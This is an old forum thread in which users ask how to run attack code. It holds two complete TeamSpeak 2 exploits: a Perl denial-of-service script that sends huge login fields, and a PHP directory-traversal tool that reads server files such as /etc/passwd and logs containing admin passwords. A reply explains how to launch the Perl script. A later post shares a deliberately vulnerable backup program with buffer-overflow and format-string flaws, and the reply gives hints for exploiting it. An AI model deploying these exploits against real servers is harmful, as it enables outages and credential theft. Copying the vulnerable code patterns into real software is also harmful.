help with exploits

coderbr · **Joined:** 11 Jul 2009 07:16 **Posts:** 3

i have two exploits for teamspeak, but i dont understood how it works
what the command line in dos for i use these exploits?

Code:

#!/usr/bin/perl

# TeamSpeak 2.0 (Windows Release) Remote D0S Exploit by Yag Kohha (skyhole [at] gmail.com)
# Vendor URL: http://www.goteamspeak.com/
# TeamSpeak WebServer has no tcp session expire and no checks for incoming values length.
# TODO: 
# Edit $target value 
# Run script
# CPU 100%, Memory up for 1.2 Gb per one attack session.
# Greetz: str0ke & milw0rm proj

use IO::Socket;

$target = 'xxx.xxx.xxx.xxx';
$port_tcp=14534;

$buffer_ascii= 'A' x 0xc00000;
$buffer_dig= '659090';
$req = "username\=$buffer_ascii\&password\=$buffer_ascii\&serverport\=$buffer_dig\&submit\=Login";
$uagent = 'Mozilla 5.0';
my $res;
my $tmp;

    print "\nStarting D0S\n\n";
    my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"$port_tcp") or die "\n Could not connect to host\n\n";

    print $sock "POST /login.tscmd HTTP/1.1\r\n";
    print $sock "Host: ".$target."\r\n";
    print $sock "User-Agent: ".$uagent."\r\n";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
    print $sock "Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    print $sock "Accept-Encoding: gzip,deflate\r\n";
    print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Referer: http://".$target."/slogin.html\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
    print $sock "Content-Length: ".length($req)."\r\n\r\n";
    print $sock $req;
    print $sock "\n";
    
   while ( $res = <$sock> ) {
   $tmp.= $res;   
    }
    print $tmp;
    close($sock);

# milw0rm.com [2007-07-20]

-----

Code:

<?php
// teamspeak server <= 2.0.23.17 remote read file vulnerability
// bug found and exploit write by c411k
// http://www.heise-online.co.uk/security/Vulnerability-in-TeamSpeak-2-server--/news/93734 zazhali ploent svolo4i!!
// tested on win ts2_server_rc2_202317, ts2_server_rc2_20201.exe
// grats all https://forum.antichat.ru
// use http://localhost/ts_xek.php
// 10.01.09

error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1);

header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache");

function check_ver($site, $xek, $port)
{
   $url = fsockopen("$site", "$port", $errno, $errstr, 22);
   $send_pac = "$xek\r\n\r\n";
   fputs($url, $send_pac);
   $s = '';
   
   while (!feof($url) and strpos(implode($s), 'OK') === false)
   {
      $s[] = fgets($url, 1028);
   }
   fclose($url);
   return implode($s);
}

function html()
{
   if (isset($_POST['file']))
      $file = $_POST['file'];
   else $file = '../../../../../etc/passwd';
   echo 
   '<pre><form action="'.$_SERVER['PHP_SELF'].'?go_fuck" method="post">
   <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="parampampam" type="submit" value="&#8194;read file...&#8194;">
   <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="check_ver" type="submit" value="&#8194;check_version&#8194;"><br>
   <input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="localhost"><font color="#B9B9BD">&#8194;&#172; teamspeak hostname or ip, for expamle "ts.antichat.ru"
   <input style="background-color: #31333B; color: #B9B9BD;" name="port" value="51234"><font color="#B9B9BD">&#8194;&#172; port to TCQquery admin, default 51234
   <input style="background-color: #31333B; color: #B9B9BD;" name="file" value="'.$file.'"><font color="#B9B9BD">&#8194;&#172; file to read.';
}

function info()
{
   echo
   '<br>
   for example: 
   server.log
   server.dbs
   ../../../../../boot.ini
   ../../../../../etc/passwd
   ../../../../../usr/local/apache/conf/httpd.conf etc.
   brain on ;)
   
   admin and superadmin passwords you can see in server.log or server.dbs. but in windows i can\'t read this files.
   
   <textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>---------------------------------------------------------------
-------------- log started at 10-01-09 00:24 -------------
---------------------------------------------------------------
10-01-09 00:24:28,ALL,Info,server,   Server init initialized
10-01-09 00:24:28,ALL,Info,server,   Server version: 2.0.20.1 Win32
10-01-09 00:24:28,WARNING,Info,SQL,   created table ts2_servers
10-01-09 00:24:28,WARNING,Info,SQL,   created table ts2_server_privileges
10-01-09 00:24:28,WARNING,Info,SQL,   created table ts2_channels
10-01-09 00:24:28,WARNING,Info,SQL,   created table ts2_channel_privileges
10-01-09 00:24:28,WARNING,Info,SQL,   created table ts2_clients
10-01-09 00:24:28,WARNING,Info,SQL,   created table ts2_bans
10-01-09 00:24:28,ALL,Info,server,   Starting VirtualServer id:1 with port:8767
10-01-09 00:24:28,WARNING,Info,SERVER,   Default VirtualServer created
10-01-09 00:24:28,WARNING,Info,SERVER,   admin account info: username: admin password: kcqy8y
10-01-09 00:24:28,WARNING,Info,SERVER,   superadmin account info: username: superadmin password: e7em45
10-01-09 00:24:29,ALL,Info,server,   Server init finished</textarea></form>';
}

function head()
{
   echo '<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>xek_teamspeak2</title>
<style>
<!--
A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:active {COLOR: #228B22; TEXT-DECORATION: none}
A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
BODY
{
   margin="5";
   FONT-WEIGHT: normal; 
   COLOR: #B9B9BD; 
   BACKGROUND: #44474F; 
   FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif; 
}

-->
</style>
</head>
<body>';
}

head();

if (!$_GET)
{
   html();
   info();
}

if (isset($_GET['go_fuck']))
{
   $hostname = $_POST['hostname'];
   $file = $_POST['file'];
   $port = $_POST['port'];
   
   if (isset($_POST['check_ver']))
   {
      echo '<pre>'.check_ver($hostname, 'ver', $port);
      
   }
   
   if (isset($_POST['parampampam']))
   {
      echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'</textarea>';
      html();
      
   }
}

?>

# milw0rm.com [2009-01-14]

aluigi · **Posted:** 11 Jul 2009 18:33

the first code is made in perl and you need to modify the $target variable and then launching perl: perl file.pl

the second one is totally useless.
that one is the bug about which I talked one year before that person in the following post:
post1677.html#p1677
it's enough netcat or even telnet connected to the port 51234 of the server for testing it

angelrita123 · **Joined:** 16 Sep 2009 07:19 **Posts:** 1

I am new to computer security. I am trying some exercises given by my friends. But they failed to provide the good answers for me, so I hope I could seek help from you guys.

Here is a backup/restore program, I was told that there must be at least five (or seven??) vulnerabilities inside and they could be exploited, could anyone tell me how to find the vulnerabilities and how I could exploit them?

It would be greatly appreciated if anyone could give me two examples to show how to exploit them. I would really like to try the rest by my own.

Thanks a lot in advance!

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/wait.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>

#define CMD_BACKUP 0
#define CMD_RESTORE 1

#define BACKUP_DIRECTORY "/usr/share/backup"
#define FORBIDDEN_DIRECTORY "/etc"

static
int copyFile(char* src, char* dst)
{
char buffer[1024];
unsigned int i, len;
FILE *source, *dest;
int c;

source = fopen(src, "r");
if (source == NULL) {
fprintf(stderr, "Failed to open source file\n");
return -1;
}

i = 0;
c = fgetc(source);
while (c != EOF) {
buffer[i] = (unsigned char) c;
c = fgetc(source);
i++;
}

len = i;
fclose(source);

dest = fopen(dst, "w");
if (dest == NULL) {
fprintf(stderr, "Failed to open destination file\n");
return -1;
}

for(i = 0; i < len; i++)
fputc(buffer[i], dest);

fclose(dest);

return 0;
}

static
int restorePermissions(char* target)
{
pid_t pid;
int status;
char *user, *userid, *ptr;
FILE *file;
char buffer[64];
mode_t mode;

// execute "chown" to assign file ownership to user
pid = fork();

// error
if (pid < 0) {
fprintf(stderr, "Fork failed\n");
return -1;
}

// parent
if (pid > 0) {
waitpid(pid, &status, 0);
if (WIFEXITED(status) == 0 || WEXITSTATUS(status) < 0)
return -1;
}
else {

// child
// retrieve username
user = getenv("USER");
// retrieve corresponding userid
file = fopen("/etc/passwd", "r");
if (file == NULL) {
fprintf(stderr, "Failed to open password file\n");
return -1;
}
userid = NULL;
while (!feof(file)) {
if (fgets(buffer, sizeof(buffer), file) != NULL) {
ptr = strtok(buffer, ":");
if (strcmp(ptr, user) == 0) {
strtok(NULL, ":"); // password
userid = strtok(NULL, ":"); // userid
ptr = strtok(NULL, ":"); // group
*ptr = '\0';
break;
}
}
}

if (userid != NULL)
execlp("chown", "chown", userid, target, NULL);

// reached only in case of error
return -1;
}

mode = S_IRUSR | S_IWUSR | S_IEXEC;
chmod(target, mode);

return 0;
}

static
void usage(char* parameter)
{
char output[128];
char buffer[128];

snprintf(buffer, sizeof(buffer), "Usage: %.88s backup|restore pathname\n",
parameter);
sprintf(output, buffer);
printf(output);
}

int main(int argc, char* argv[])
{
int cmd;
char *path, *ptr;
char *forbidden = FORBIDDEN_DIRECTORY;
char *src, *dst, *buffer;

if (argc != 3) {
usage(argv[0]);
return 1;
}

if (strcmp("backup", argv[1]) == 0) {
cmd = CMD_BACKUP;
}
else if (strcmp("restore", argv[1]) == 0) {
cmd = CMD_RESTORE;
} else {
usage(argv[0]);
return 1;
}

path = argv[2];

// prevent access to forbidden directory
ptr = realpath(path, NULL);
if (ptr != NULL && strstr(ptr, forbidden) == ptr) {
fprintf(stderr, "Not allowed to access target/source %s\n", path);
return 1;
}

// set up paths for copy operation
buffer = malloc(strlen(BACKUP_DIRECTORY) + 1 + strlen(path) + 1);
if (buffer == NULL) {
fprintf(stderr, "Failed to allocate memory\n");
return 1;
}

if (cmd == CMD_BACKUP) {
src = path;

dst = buffer;
strcpy(dst, BACKUP_DIRECTORY);
strcat(dst, "/");
strcat(dst, path);
}
else {
src = buffer;
strcpy(src, BACKUP_DIRECTORY);
strcat(src, "/");
strcat(src, path);

dst = path;
}

// perform actual backup/restore operation
if (copyFile(src, dst) < 0)
return 1;

// grant user access to restored file
if (cmd == CMD_RESTORE) {
if (restorePermissions(path) < 0)
return 1;
}

return 0;

live chat support

aluigi · **Posted:** 19 Sep 2009 12:22

the first type of bug you must look at is the buffer-overflow, so you must check any field where happens the copy of data from an input to a buffer.
this can happen with a copy byte-per-byte from a file, or with a sprintf, or with the appending of a string to the buffer (for example with strcat).
and obviously don't forget the format string bugs.
that's enough for the moment.

anyway I don't like to waste time on these things, so please refer to this section only for real programming problems.

Luigi Auriemma

help with exploits